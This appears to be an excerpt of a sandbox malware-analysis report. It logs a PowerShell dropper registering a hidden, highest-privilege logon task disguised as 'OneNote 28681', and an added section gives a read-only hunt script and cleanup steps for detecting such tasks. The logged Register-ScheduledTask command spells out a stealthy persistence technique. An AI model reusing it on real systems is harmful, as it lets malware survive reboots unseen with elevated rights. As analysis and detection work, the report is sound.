    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447E6F3 pushad ; iretd 7_2_0447E75A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447E75F pushad ; iretd 7_2_0447E762
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_044742A8 push ebx; ret 7_2_044742DA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447DC53 push esp; iretd 7_2_0447DC5A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447DC51 push esp; iretd 7_2_0447DC52
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447EC7B pushfd ; iretd 7_2_0447EC81
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447AC93 push ds; iretd 7_2_0447AC9A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447AC90 push ds; iretd 7_2_0447AC92
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447DE48 push ebp; iretd 7_2_0447DE4A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04479861 push ss; iretd 7_2_04479862
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_044798B9 push ss; iretd 7_2_044798BA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447997B push ss; iretd 7_2_04479982
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04479978 push ss; iretd 7_2_0447997A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04479923 push ss; iretd 7_2_0447992A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04479920 push ss; iretd 7_2_04479922
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_044799D9 push ss; iretd 7_2_044799DA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04479A41 push ss; iretd 7_2_04479A42
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04479AA3 push ss; iretd 7_2_04479AAA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04473AA8 push ebx; retf 7_2_04473ADA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04479B73 push ss; iretd 7_2_04479B7A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04479B70 push ss; iretd 7_2_04479B72
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04479B09 push ss; iretd 7_2_04479B0A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447DBD9 push ebx; iretd 7_2_0447DBDA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00F361B0 push esp; ret 10_2_00F361F9
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00F36215 push esp; ret 10_2_00F361F9
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00E1C031 push ebx; ret 12_2_00E1C03E
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00E1C1F3 pushfd ; ret 12_2_00E1C202
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00E1C981 pushfd ; ret 12_2_00E1C986
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00E1EB5C push ds; retf 0071h 12_2_00E1EB63
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00E1ADF1 pushad ; ret 12_2_00E1ADFE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00E1ADA9 pushad ; ret 12_2_00E1ADB6
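    Added hunt example (not part of the Joe Sandbox report and not code taken from the sample). The process creations above show the persistence step in the clear: the dropper first evaluates `[Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('<its own path>')`, which only tests whether some existing task action already points at its current location and surfaces the answer through the console window title rather than an exit code, and then registers `OneNote 28681` as a hidden, logon-triggered task with `-RunLevel Highest` and no execution time limit, whose action is a `.cmd` dropped under `%APPDATA%`. The repeated `BitLocker.psd1` opens in the section that follows are most likely a side effect of PowerShell's module auto-loading reading module manifests to resolve `Get-ScheduledTask` and `Register-ScheduledTask`, not a use of BitLocker by the sample. None of the task traits is malicious on its own; the script below enumerates every task on a host and reports those that combine several of them. The user-writable roots, the script-extension pattern, the vendor-name regex and the `$MinScore` threshold are assumptions chosen for illustration; the function only reads task definitions and changes nothing.

```powershell
# Added hunt script: not from the Joe Sandbox report and not the sample's code.
# Scores every scheduled task for the traits combined by 'OneNote 28681':
# hidden, logon trigger, RunLevel Highest, action in a user-writable path,
# script file as the action, vendor-like name in the root task folder.
# The lists, regexes and threshold below are illustrative assumptions.

$SuspiciousRoots = @(
    $env:APPDATA, $env:LOCALAPPDATA, $env:TEMP, $env:PUBLIC,
    (Join-Path $env:USERPROFILE 'Desktop'),
    (Join-Path $env:USERPROFILE 'Downloads')
) | Where-Object { $_ }                       # drop any variable that is unset

$ScriptPattern = '\.(cmd|bat|vbs|vbe|js|jse|wsf|hta|ps1)$'
$VendorNames   = '^(OneNote|OneDrive|Office|Microsoft|Google|Adobe)\b'

function Get-SuspiciousScheduledTask {
    [CmdletBinding()]
    param(
        # Minimum number of matching traits before a task is reported (assumption).
        [int]$MinScore = 3
    )

    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($action in @($task.Actions)) {
            # Only MSFT_TaskExecAction carries Execute; COM-handler actions are skipped.
            if (-not $action.Execute) { continue }
            $exe     = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
            $reasons = New-Object System.Collections.Generic.List[string]

            if ($task.Settings.Hidden) { $reasons.Add('Hidden') }
            if ("$($task.Principal.RunLevel)" -eq 'Highest') { $reasons.Add('RunLevel=Highest') }

            $logonTrigger = @($task.Triggers) |
                Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }
            if ($logonTrigger) { $reasons.Add('Logon trigger') }

            # The sample's action lives in %APPDATA%; any user-writable root is a flag.
            $inUserPath = $SuspiciousRoots |
                Where-Object { $exe.StartsWith($_, [StringComparison]::OrdinalIgnoreCase) }
            if ($inUserPath) { $reasons.Add('User-writable path') }

            if ($exe -match $ScriptPattern) { $reasons.Add('Script as action') }

            # 'OneNote 28681' sits directly in the root folder; vendor tasks normally
            # live under a vendor subfolder such as \Microsoft\Office\.
            if ($task.TaskPath -eq '\' -and $task.TaskName -match $VendorNames) {
                $reasons.Add('Vendor-like name in root folder')
            }

            if ($reasons.Count -ge $MinScore) {
                [pscustomobject]@{
                    TaskPath  = $task.TaskPath
                    TaskName  = $task.TaskName
                    Author    = $task.Author
                    Execute   = $exe
                    Arguments = $action.Arguments
                    Score     = $reasons.Count
                    Reasons   = ($reasons -join ', ')
                }
            }
        }
    }
}

# Usage: run from an elevated prompt so tasks registered by other accounts are visible too.
Get-SuspiciousScheduledTask | Sort-Object Score -Descending | Format-Table -AutoSize -Wrap
```

    When a row appears, pull the full definition with `Export-ScheduledTask -TaskPath '\' -TaskName 'OneNote 28681'` (it returns the task XML) and the last-run data with `Get-ScheduledTaskInfo` before removing it with `Unregister-ScheduledTask -TaskPath '\' -TaskName 'OneNote 28681' -Confirm:$false`. The dropped `Network28681Man.cmd` under `%APPDATA%` and the Defender exclusion listed in the signature summary are separate artefacts and must be cleaned up on their own. The function is host-local; for fleet coverage run it through EDR or PowerShell remoting, or alert on Security event 4698 (a scheduled task was created), which needs the "Audit Other Object Access Events" subcategory enabled and carries the same task XML.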

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
